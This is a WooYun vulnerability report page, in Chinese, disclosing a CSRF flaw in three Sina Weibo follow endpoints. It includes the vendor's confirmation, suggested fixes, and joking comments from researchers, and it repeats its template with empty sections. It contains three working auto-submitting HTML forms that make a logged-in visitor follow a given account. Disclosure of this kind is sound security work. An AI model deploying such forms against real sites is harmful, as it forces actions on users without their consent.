新浪微博CSRF之点我链接就会关注我 | wooyun-2015-0160873| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160873

漏洞标题：新浪微博CSRF之点我链接就会关注我

漏洞作者： zhchbin

提交时间：2015-12-13 09:49

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-13：细节已通知厂商并且等待厂商处理中
2015-12-14：厂商已经确认，细节仅向厂商公开
2015-12-24：细节向核心白帽子及相关领域专家公开
2016-01-03：细节向普通白帽子公开
2016-01-13：细节向实习白帽子公开
2016-01-25：细节向公众公开

简要描述：

朋友问我为什么能找到微博的CSRF，答曰：没有女朋友
打包几个接口一起发吧，不需要任何绕过。

详细说明：

存在问题的几个接口，都是跟关注用户相关的API

http://game.weibo.com/site/user/ajaxFollow
http://game.weibo.com/home/user/ajaxFollow
http://book.weibo.com/newcms/i/weibo_relation.php

测试用的HTML，没有校验referrer，无需绕过。
test_01.html

<form action="http://game.weibo.com/site/user/ajaxFollow" method="post"> 
<input type="text" name="userId" value="5209822066" /> 
<script> document.forms[0].submit(); </script> 
</form>

test_02.html

<form action="http://game.weibo.com/home/user/ajaxFollow" method="post"> 
<input type="text" name="userId" value="5209822066" /> 
<script> document.forms[0].submit(); </script> 
</form>

test_03.html

<form action="http://book.weibo.com/newcms/i/weibo_relation.php" method="post"> 
<input type="text" name="userid" value="5209822066" /> 
<input type="text" name="type" value="follow" /> 
<script> document.forms[0].submit(); </script> 
</form>

漏洞证明：

参考： WooYun: 新浪微博CSRF之点我链接就会关注

修复方案：

1. 验证referrer
2. 找找还有没有存在类似问题的其他接口吧，这种类型的我不找了！
3. 求Rank！

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-12-14 13:26

厂商回复：

感谢支持，已经联系相关业务修复

漏洞评价：

评价

2015-12-13 09:59 | 随风的风 ( 普通白帽子 | Rank:190 漏洞数:67 | 微信公众号：233sec 不定期分享各种漏洞思...)

说的好像你提交了就有女朋友了一样。
2015-12-13 10:13 | zhchbin ( 实习白帽子 | Rank:88 漏洞数:21 | 要走得再远一些！)

@随风的风人艰不拆 ==
2015-12-13 10:19 | Mieless ( 实习白帽子 | Rank:35 漏洞数:10 | 我是来打酱油的。)

不是发过了吗
2015-12-13 10:36 | zhchbin ( 实习白帽子 | Rank:88 漏洞数:21 | 要走得再远一些！)

@Mieless 这个是新的不同的接口，之前那个已经确认修复。本来标题有个第二波又不见了。
2015-12-13 11:51 | 随风的风 ( 普通白帽子 | Rank:190 漏洞数:67 | 微信公众号：233sec 不定期分享各种漏洞思...)

@zhchbin 挖啥洞啊，还不去找女朋友啊
2015-12-13 14:40 | 拖鞋快跑 ( 路人 | Rank:0 漏洞数:1 | 实习小拖鞋)

说的好像你提交了就有女朋友了一样。
2015-12-13 15:28 | socket ( 实习白帽子 | Rank:32 漏洞数:11 | )

@随风的风不要瞎说大实话嘛。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160873

漏洞标题：新浪微博CSRF之点我链接就会关注我

相关厂商：新浪微博

漏洞作者： zhchbin

提交时间：2015-12-13 09:49

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0160873

漏洞标题：新浪微博CSRF之点我链接就会关注我

相关厂商：新浪微博

漏洞作者： zhchbin

提交时间：2015-12-13 09:49

修复时间：2016-01-25 18:01

公开时间：2016-01-25 18:01

漏洞类型：CSRF

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0160873"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：